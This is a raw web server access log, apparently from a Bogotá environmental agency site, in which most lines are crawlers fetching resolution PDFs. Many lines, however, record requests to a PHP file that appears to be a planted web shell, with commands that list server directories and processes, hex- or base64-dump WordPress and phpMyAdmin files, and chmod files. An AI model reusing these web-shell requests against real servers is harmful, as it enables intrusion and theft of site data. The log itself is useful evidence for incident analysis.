47.128.38.9 - - [25/Apr/2024:06:03:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.38.9 - - [25/Apr/2024:06:03:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
23.22.35.162 - - [25/Apr/2024:06:03:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2405.pdf HTTP/1.1" 200 486694
3.224.220.101 - - [25/Apr/2024:06:03:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2898.pdf HTTP/1.1" 200 1183191
52.70.240.171 - - [25/Apr/2024:06:03:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2404.pdf HTTP/1.1" 200 633993
216.244.66.195 - - [25/Apr/2024:06:03:21 -0500] "GET /robots.txt HTTP/1.1" 404 1018
3.224.220.101 - - [25/Apr/2024:06:03:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2897.pdf HTTP/1.1" 200 278343
3.224.220.101 - - [25/Apr/2024:06:03:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2403.pdf HTTP/1.1" 200 353618
47.128.18.184 - - [25/Apr/2024:06:03:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page36_thumbnail.jpg&imgsize=20 HTTP/1.1" 200 16211
47.128.18.184 - - [25/Apr/2024:06:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.18.184 - - [25/Apr/2024:06:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.18.184 - - [25/Apr/2024:06:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.18.184 - - [25/Apr/2024:06:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.18.184 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.18.184 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.18.184 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.18.184 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.18.184 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
52.70.240.171 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2896.pdf HTTP/1.1" 200 317230
47.128.18.184 - - [25/Apr/2024:06:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
23.22.35.162 - - [25/Apr/2024:06:03:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2402.pdf HTTP/1.1" 200 360277
52.70.240.171 - - [25/Apr/2024:06:03:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2892.pdf HTTP/1.1" 200 283809
3.224.220.101 - - [25/Apr/2024:06:03:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2401.pdf HTTP/1.1" 200 363491
23.22.35.162 - - [25/Apr/2024:06:03:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2891.pdf HTTP/1.1" 200 285957
3.224.220.101 - - [25/Apr/2024:06:03:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2890.pdf HTTP/1.1" 200 289196
23.22.35.162 - - [25/Apr/2024:06:03:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2393.pdf HTTP/1.1" 200 431649
52.70.240.171 - - [25/Apr/2024:06:04:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2889.pdf HTTP/1.1" 200 283408
47.128.111.11 - - [25/Apr/2024:06:04:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page30.swf&fullhexdump=1 HTTP/1.1" 200 3023
172.22.2.4 - - [25/Apr/2024:06:04:03 -0500] "GET /BLA/boletinlegal/CMSInstall/install.aspx HTTP/1.1" 404 1038
3.224.220.101 - - [25/Apr/2024:06:04:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2387.pdf HTTP/1.1" 200 354965
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.111.11 - - [25/Apr/2024:06:04:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.111.11 - - [25/Apr/2024:06:04:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.111.11 - - [25/Apr/2024:06:04:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.111.11 - - [25/Apr/2024:06:04:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:06:04:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2888.pdf HTTP/1.1" 200 283804
47.128.111.11 - - [25/Apr/2024:06:04:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page30.swf&fullhexdump=1 HTTP/1.1" 200 3023
23.22.35.162 - - [25/Apr/2024:06:04:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2383.pdf HTTP/1.1" 200 464057
172.22.2.4 - - [25/Apr/2024:06:02:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.70.240.171 - - [25/Apr/2024:06:04:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2380.pdf HTTP/1.1" 200 525606
47.128.18.245 - - [25/Apr/2024:06:04:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cparty%5C&f=7.png&imgsize=100 HTTP/1.1" 200 15461
47.128.18.245 - - [25/Apr/2024:06:04:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.18.245 - - [25/Apr/2024:06:04:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.18.245 - - [25/Apr/2024:06:04:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.18.245 - - [25/Apr/2024:06:04:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.18.245 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
52.70.240.171 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2887.pdf HTTP/1.1" 200 269917
47.128.18.245 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.18.245 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.18.245 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.18.245 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.18.245 - - [25/Apr/2024:06:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
3.224.220.101 - - [25/Apr/2024:06:04:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2379.pdf HTTP/1.1" 200 461851
23.22.35.162 - - [25/Apr/2024:06:04:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2885.pdf HTTP/1.1" 200 281172
52.70.240.171 - - [25/Apr/2024:06:04:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2883.pdf HTTP/1.1" 200 329871
52.70.240.171 - - [25/Apr/2024:06:04:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2363.pdf HTTP/1.1" 200 435984
3.224.220.101 - - [25/Apr/2024:06:04:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2881.pdf HTTP/1.1" 200 338373
23.22.35.162 - - [25/Apr/2024:06:04:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2880.pdf HTTP/1.1" 200 290849
47.128.110.75 - - [25/Apr/2024:06:04:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page69_thumbnail.jpg&imgsize=50 HTTP/1.1" 200 16157
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.110.75 - - [25/Apr/2024:06:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:06:04:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2361.pdf HTTP/1.1" 200 393665
23.22.35.162 - - [25/Apr/2024:06:04:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2879.pdf HTTP/1.1" 200 290302
52.70.240.171 - - [25/Apr/2024:06:04:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2360.pdf HTTP/1.1" 200 509167
52.70.240.171 - - [25/Apr/2024:06:05:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2878.pdf HTTP/1.1" 200 707850
3.224.220.101 - - [25/Apr/2024:06:05:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2359.pdf HTTP/1.1" 200 340895
172.22.2.4 - - [25/Apr/2024:06:03:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
52.70.240.171 - - [25/Apr/2024:06:05:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2877.pdf HTTP/1.1" 200 1361876
47.128.36.168 - - [25/Apr/2024:06:05:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5Ccolores%5C HTTP/1.1" 200 3645
52.70.240.171 - - [25/Apr/2024:06:05:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2358.pdf HTTP/1.1" 200 539271
3.224.220.101 - - [25/Apr/2024:06:05:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2876.pdf HTTP/1.1" 200 281067
23.22.35.162 - - [25/Apr/2024:06:05:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2357.pdf HTTP/1.1" 200 714347
52.70.240.171 - - [25/Apr/2024:06:05:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2356.pdf HTTP/1.1" 200 671364
52.70.240.171 - - [25/Apr/2024:06:05:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2875.pdf HTTP/1.1" 200 279017
47.128.36.197 - - [25/Apr/2024:06:05:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=options-media.php&fullhexdump=1 HTTP/1.1" 200 5401
23.22.35.162 - - [25/Apr/2024:06:05:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2874.pdf HTTP/1.1" 200 280127
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.36.197 - - [25/Apr/2024:06:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.36.197 - - [25/Apr/2024:06:05:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.36.197 - - [25/Apr/2024:06:05:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.36.197 - - [25/Apr/2024:06:05:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
66.249.66.20 - - [25/Apr/2024:06:05:35 -0500] "GET /BLA/resoluciones/AUTOS%202014/4183.pdf HTTP/1.1" 200 312829
52.70.240.171 - - [25/Apr/2024:06:05:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2355.pdf HTTP/1.1" 200 687200
23.22.35.162 - - [25/Apr/2024:06:05:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2873.pdf HTTP/1.1" 200 279567
3.224.220.101 - - [25/Apr/2024:06:05:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2354.pdf HTTP/1.1" 200 453883
52.70.240.171 - - [25/Apr/2024:06:05:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2352.pdf HTTP/1.1" 200 510802
23.22.35.162 - - [25/Apr/2024:06:05:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2346.pdf HTTP/1.1" 200 360754
52.70.240.171 - - [25/Apr/2024:06:05:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2872.pdf HTTP/1.1" 200 299259
47.128.36.231 - - [25/Apr/2024:06:05:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cnetwork%5C&f=credits.php HTTP/1.1" 200 3363
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.36.231 - - [25/Apr/2024:06:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.36.231 - - [25/Apr/2024:06:05:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.36.231 - - [25/Apr/2024:06:05:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.36.231 - - [25/Apr/2024:06:05:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:06:05:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2345.pdf HTTP/1.1" 200 358363
3.224.220.101 - - [25/Apr/2024:06:06:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2870.pdf HTTP/1.1" 200 280080
181.59.244.61 - - [25/Apr/2024:06:06:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 490673
40.77.167.32 - - [25/Apr/2024:06:06:06 -0500] "GET /Publicaciones/2024EE00273.pdf HTTP/1.1" 404 227
23.22.35.162 - - [25/Apr/2024:06:06:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2344.pdf HTTP/1.1" 200 366707
3.224.220.101 - - [25/Apr/2024:06:06:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2869.pdf HTTP/1.1" 200 280964
3.224.220.101 - - [25/Apr/2024:06:06:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2343.pdf HTTP/1.1" 200 362264
52.70.240.171 - - [25/Apr/2024:06:06:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2866.pdf HTTP/1.1" 200 279901
47.128.36.170 - - [25/Apr/2024:06:06:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cnextgen&f=1.png HTTP/1.1" 200 2881
23.22.35.162 - - [25/Apr/2024:06:06:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2340.pdf HTTP/1.1" 200 368496
52.70.240.171 - - [25/Apr/2024:06:06:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2864.pdf HTTP/1.1" 200 280695
23.22.35.162 - - [25/Apr/2024:06:06:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2339.pdf HTTP/1.1" 200 365495
3.224.220.101 - - [25/Apr/2024:06:06:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2863.pdf HTTP/1.1" 200 311434
52.70.240.171 - - [25/Apr/2024:06:06:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2337.pdf HTTP/1.1" 200 365243
23.22.35.162 - - [25/Apr/2024:06:06:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2861.pdf HTTP/1.1" 200 279255
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.119.89 - - [25/Apr/2024:06:06:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccurtiembres%5Cimages&f=page100_thumbnail.jpg HTTP/1.1" 200 16349
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.119.89 - - [25/Apr/2024:06:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
52.70.240.171 - - [25/Apr/2024:06:06:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2336.pdf HTTP/1.1" 200 363592
52.70.240.171 - - [25/Apr/2024:06:06:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2860.pdf HTTP/1.1" 200 280583
3.224.220.101 - - [25/Apr/2024:06:06:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2328.pdf HTTP/1.1" 200 356862
52.70.240.171 - - [25/Apr/2024:06:06:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2859.pdf HTTP/1.1" 200 282330
23.22.35.162 - - [25/Apr/2024:06:07:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2858.pdf HTTP/1.1" 200 280794
52.70.240.171 - - [25/Apr/2024:06:07:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2327.pdf HTTP/1.1" 200 596438
47.128.25.236 - - [25/Apr/2024:06:07:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cphp-gettext%5C&f=gettext.php HTTP/1.1" 200 8476
47.128.25.236 - - [25/Apr/2024:06:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.25.236 - - [25/Apr/2024:06:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.25.236 - - [25/Apr/2024:06:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.25.236 - - [25/Apr/2024:06:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.25.236 - - [25/Apr/2024:06:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.25.236 - - [25/Apr/2024:06:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.25.236 - - [25/Apr/2024:06:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.25.236 - - [25/Apr/2024:06:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.25.236 - - [25/Apr/2024:06:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.25.236 - - [25/Apr/2024:06:07:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
52.70.240.171 - - [25/Apr/2024:06:07:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2857.pdf HTTP/1.1" 200 279448
3.224.220.101 - - [25/Apr/2024:06:07:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2322.pdf HTTP/1.1" 200 365372
23.22.35.162 - - [25/Apr/2024:06:07:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2855.pdf HTTP/1.1" 200 280300
23.22.35.162 - - [25/Apr/2024:06:07:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2321.pdf HTTP/1.1" 200 359278
181.59.244.61 - - [25/Apr/2024:06:07:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2696840
23.22.35.162 - - [25/Apr/2024:06:07:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2854.pdf HTTP/1.1" 200 306518
52.70.240.171 - - [25/Apr/2024:06:07:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2320.pdf HTTP/1.1" 200 363361
47.128.40.245 - - [25/Apr/2024:06:07:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=search&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cstar%5C HTTP/1.1" 200 2880
157.55.39.60 - - [25/Apr/2024:06:07:33 -0500] "GET /Publicaciones/2024EE70984.pdf HTTP/1.1" 404 227
52.70.240.171 - - [25/Apr/2024:06:07:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2852.pdf HTTP/1.1" 200 280736
201.245.192.253 - - [25/Apr/2024:06:07:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41163
52.70.240.171 - - [25/Apr/2024:06:07:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2319.pdf HTTP/1.1" 200 362656
3.224.220.101 - - [25/Apr/2024:06:07:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2851.pdf HTTP/1.1" 200 281040
3.224.220.101 - - [25/Apr/2024:06:07:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2318.pdf HTTP/1.1" 200 356046
23.22.35.162 - - [25/Apr/2024:06:07:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2850.pdf HTTP/1.1" 200 280635
3.224.220.101 - - [25/Apr/2024:06:07:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2317.pdf HTTP/1.1" 200 358476
47.128.35.44 - - [25/Apr/2024:06:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.35.44 - - [25/Apr/2024:06:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.35.44 - - [25/Apr/2024:06:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
